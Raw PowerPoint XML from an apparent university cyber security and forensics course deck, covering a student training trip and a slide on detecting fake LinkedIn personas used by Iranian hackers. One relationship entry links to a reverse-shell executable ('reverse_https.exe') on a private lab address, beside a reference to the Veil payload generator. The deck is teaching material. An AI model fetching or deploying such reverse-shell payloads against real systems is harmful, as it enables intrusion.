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98" r:id="rId3"/>
    <p:sldId id="299" r:id="rId4"/>
    <p:sldId id="300" r:id="rId5"/>
    <p:sldId id="301" r:id="rId6"/>
    <p:sldId id="302" r:id="rId7"/>
    <p:sldId id="303" r:id="rId8"/>
    <p:sldId id="256" r:id="rId9"/>
    <p:sldId id="257" r:id="rId10"/>
    <p:sldId id="266" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="270" r:id="rId14"/>
    <p:sldId id="271" r:id="rId15"/>
    <p:sldId id="272"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344" r:id="rId37"/>
    <p:sldId id="306" r:id="rId38"/>
    <p:sldId id="309" r:id="rId39"/>
    <p:sldId id="310" r:id="rId40"/>
    <p:sldId id="311" r:id="rId41"/>
    <p:sldId id="345" r:id="rId42"/>
    <p:sldId id="346" r:id="rId43"/>
    <p:sldId id="347" r:id="rId44"/>
    <p:sldId id="314" r:id="rId45"/>
    <p:sldId id="315" r:id="rId46"/>
    <p:sldId id="316" r:id="rId47"/>
    <p:sldId id="320" r:id="rId48"/>
    <p:sldId id="322" r:id="rId49"/>
    <p:sldId id="323" r:id="rId50"/>
    <p:sldId id="325" r:id="rId51"/>
    <p:sldId id="326" r:id="rId52"/>
    <p:sldId id="337" r:id="rId53"/>
    <p:sldId id="338" r:id="rId54"/>
    <p:sldId id="339" r:id="rId55"/>
    <p:sldId id="340" r:id="rId56"/>
    <p:sldId id="342" r:id="rId57"/>
    <p:sldId id="348" r:id="rId5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09" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="1170" y="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6000" b="1"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7/22/2017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0"/>
            <a:ext cx="9144000" cy="990600"/>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0"/>
            <a:ext cx="9144000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="bk object 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1239837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>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7/22/2017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0"/>
            <a:ext cx="9144000" cy="990600"/>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0"/>
            <a:ext cx="9144000" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="bk object 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1239837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>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196087" y="-28955"/>
            <a:ext cx="8750935" cy="1108710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3600" b="1"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2586989" y="3403980"/>
            <a:ext cx="3970020" cy="2411095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6000" b="1"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7/22/2017</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secureworks.com/research/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles"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hyperlink" Target="http://www.surfwatchlabs.com/why-surfwatch-threat-intelligence" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.optiv.com/blog/the-3-pillars-of-intelligence-shaping-policy"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hyperlink" Target="http://www.shodan.io/"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mailto:m.gilhespy@hva.nl"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192.168.248.130/reverse_https.exe"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hristophertruncer.com/veil-a-payload-"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hyperlink" Target="http://www.sans.org/reading-room/whitepapers/malicious/detailed-analysis-advanced-persistent-threat-malware-33814"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microsoft.com/en-gb/account/)"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slide" Target="slide3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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide39.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slide" Target="slide39.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><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2.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.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44.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 Target="slide45.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide44.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jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.jpg"/><Relationship Id="rId9"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 Target="slide44.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slide" Target="slide44.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.jpg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide49.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slide" Target="slide44.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><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slide" Target="slide44.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slide" Target="slide44.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2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.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47.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mailto:A.Dehghantanha@salford.ac.uk" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:AliD@AliD.info" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.AliD.info/"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5.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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="34290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0"/>
            <a:ext cx="9144000" cy="3429000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="2769989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="6000" spc="-5" dirty="0"/>
              <a:t>Cyber</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6000" spc="-70" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" spc="-70" dirty="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="6000" spc="-70" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" spc="-70" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="6000" spc="-70" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" spc="-70" dirty="0"/>
              <a:t>Forensics</a:t>
            </a:r>
            <a:endParaRPr sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="3574287"/>
            <a:ext cx="7841249" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>During the summer break, some of the student made a trip over to ESIA in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>france</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This was for a Cyber Security Course</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>	This consisted of three days over overview and training and then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>	a real life test of what we had learned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Here is a brief overview of some of the days we had in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>france</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> and what you can</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>expect from cyber security at Salford university and beyond.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3339685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3429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583942" y="3765169"/>
            <a:ext cx="3898265" cy="559435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Detecting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Personas!</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4762" y="0"/>
            <a:ext cx="9153525" cy="3509962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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209550" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2007870">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>Detecting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-95" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>Personas!</a:t>
            </a:r>
            <a:endParaRPr sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78739" y="1192529"/>
            <a:ext cx="8320405" cy="4584065"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="264160" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Refer to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Dell </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Secure report about Iranian hackers who  used fake personas in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>LinkedIn:</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" marR="5080" indent="-287020">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>–	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.secureworks.com/research/suspected-iran-based-  hacker-group-creates-network-of-fake-linkedin-profiles</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>intrusions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>were</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>detected?</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>What are detected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-65" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>compromises?</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>What/who were their</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>targets?</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>many </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>personas were created?</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>What is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>the link </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>between these</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-60" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>personas?</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>What was </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>their pivoting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>technique?</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="5562548"/>
            <a:ext cx="1600200" cy="1274445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
